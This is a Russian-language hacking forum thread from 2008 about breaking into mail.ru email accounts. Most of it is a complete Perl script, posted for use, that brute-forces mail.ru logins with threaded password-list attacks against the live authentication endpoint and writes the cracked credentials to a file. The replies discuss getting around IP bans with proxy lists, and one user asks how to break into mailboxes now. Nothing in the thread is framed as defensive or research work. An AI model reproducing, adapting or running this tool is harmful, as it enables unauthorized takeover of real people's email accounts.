HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.01.2008, 02:42
SchmeL
Участник форума
Регистрация: 16.06.2007
Сообщений: 104
Провел на форуме:
178647

Репутация: 143
По умолчанию

Код:
 #!/usr/bin/perl

use LWP::UserAgent;
use threads;
use threads::shared;
my $num : shared;
my $dyndyk : shared;
my $thepass : shared;

print "\a\a\a\a########## GeNoM-- mail.ru bruter v 3.0 || http://www.genom.h10.ru ###############\n";

my $ua = LWP::UserAgent->new(
max_size => 1024,
agent => 'kakep brayzer v 9.1.1',
timeout => 30,
);

#     $proxy='127.0.0.1:8080';
#     $ua->proxy('http'=>"http://$proxy");    # вот ваша прокся запишите тип http или socks и адрес можете в переменную можете просто так

$threads=4;       # количество потоков
$tclover=40;      # количество пасов отбручиваемых потоком

$time=localtime;
print "Start brute in $time\n";

open(pass,"<pass.txt");
while($sykaz=<pass>){$what_pass++;}
close(pass);
open(mails,"<mail.txt");
while($sykaz=<mails>){$what_mail++;}
close(mails);
print"\n~~~~~  total mails:$what_mail and password:$what_pass  ~~~~~\n\n";

open(mails,"<mail.txt");


while ($mails=<mails>) {
open(pass,"<pass.txt");
print"Start brute mail->$mails\n";
$mails=~s/\n//; 
($login,$domain)=split(/\@/,$mails);

#   threads->create(\&loginbr);  # вот перебор по логин+цифра  если он нужен уберите решетку

puk:
# считываем пасы в массив для последующего скармливания их потоку
for ($i = 0; $i < $tclover; $i++) { 
$password=<pass>;
$password=~s/\n//;
@passwd[$i]=$password;
}


open logg,">>log.txt";print logg "\n\nStart new thread with mail->$mails and password->@passwd[0]\n";close logg;
threads->create(\&brut,@passwd);
$num++;
$got=$got+$tclover;
$progr=int(($got/$what_pass)*100);
print"\nStart new thread with mail->$mails & password->@passwd[0] & bruted password->$got & progress->$progr%\n";
sleep(1); 
if($got >= $what_pass){print"\n\nEnd of password list ....\n\n";goto(konec);}
if($dyndyk==55){print"\n\n\a\a\a####### BRUTE PASSWORD [OK].... see brute_mail.txt #######\n\n";goto(konec);}
check:
if($num < $threads){goto(puk)}
else{sleep(1);goto(check);};
konec:
$got=0;
foreach(threads->list) { $_->join } # ждем оконания остальных потоков и идем дальше
close(pass);
$dyndyk=0;
}

close(mails);
 
 
sub brut {
foreach $pyss(@_){
if($dyndyk==55){goto(proskok);}

my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth');
$req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$pyss");
$req->referer('http://win.mail.ru/cgi-bin/auth');
my $res = $ua->request($req);

if($res->content=~/500 Can't connect/i) {print "Bad connect.......\n";exit;}        
if($res->content=~/checkcookie/i) {$dyndyk=55; print "\a\a\aFor $login\@$domain password->$pyss\n";
open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$pyss\n";close brut; 
open logg,">>log.txt";print logg "For $login\@$domain password->$pyss\n";close logg;}   
proskok:

}
$num--;
}

sub loginbr {
print"Start simple brute login->$login\n\n";
for($tt=0;$tt<=99;$tt++){

my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth');
$req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$login$tt");
$req->referer('http://win.mail.ru/cgi-bin/auth');
my $res = $ua->request($req);

if($res->content=~/500 Can't connect/i) {print "$yda4a\n";exit;}        
if($res->content=~/checkcookie/i) {$dyndyk=55; print "For $login\@$domain password->$login$tt\n";
open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$login$tt\n";close brut; 
open logg,">>log.txt";print logg "For $login\@$domain password->$login$tt\n";close logg;goto(pyps);
}
pyps:
}
}
вот этим раньше пользовался для брута, актуаленли он щас не знаю...
 
Ответить с цитированием

  #12  
Старый 28.01.2008, 13:20
Black dead
Постоянный
Регистрация: 27.05.2007
Сообщений: 301
Провел на форуме:
3760933

Репутация: 322
Отправить сообщение для Black dead с помощью ICQ
По умолчанию

SchmeL тоже самое будет , что и с AET2 бан IP на некоторое время
 
Ответить с цитированием

  #13  
Старый 04.02.2008, 02:18
SchmeL
Участник форума
Регистрация: 16.06.2007
Сообщений: 104
Провел на форуме:
178647

Репутация: 143
По умолчанию

Цитата:
Сообщение от Black dead  
SchmeL тоже самое будет , что и с AET2 бан IP на некоторое время
можно в принципе сделать proxy-list, но тож не вариант если каждый прокс будут блокировать на n минут...
 
Ответить с цитированием

  #14  
Старый 11.02.2008, 15:35
Chrek625
Участник форума
Регистрация: 06.06.2006
Сообщений: 163
Провел на форуме:
1025198

Репутация: 11
По умолчанию

ТАк как же теперь взламывать ящики на mail.ru????
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
проблема на mail.ru Dim_B Уязвимости Mail-сервис 4 18.01.2006 21:37
Mail.Ru и «Яндекс» официально объявили о сотрудничестве •••™NO FEAR™••• Мировые новости. Обсуждения. 1 17.01.2006 13:51
проблема с mail.ru unhappy Уязвимости Mail-сервис 7 19.06.2005 19:31
ВАЖНАЯ ПРОБЛЕМА!!! Sn_key Уязвимости 13 08.06.2005 15:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ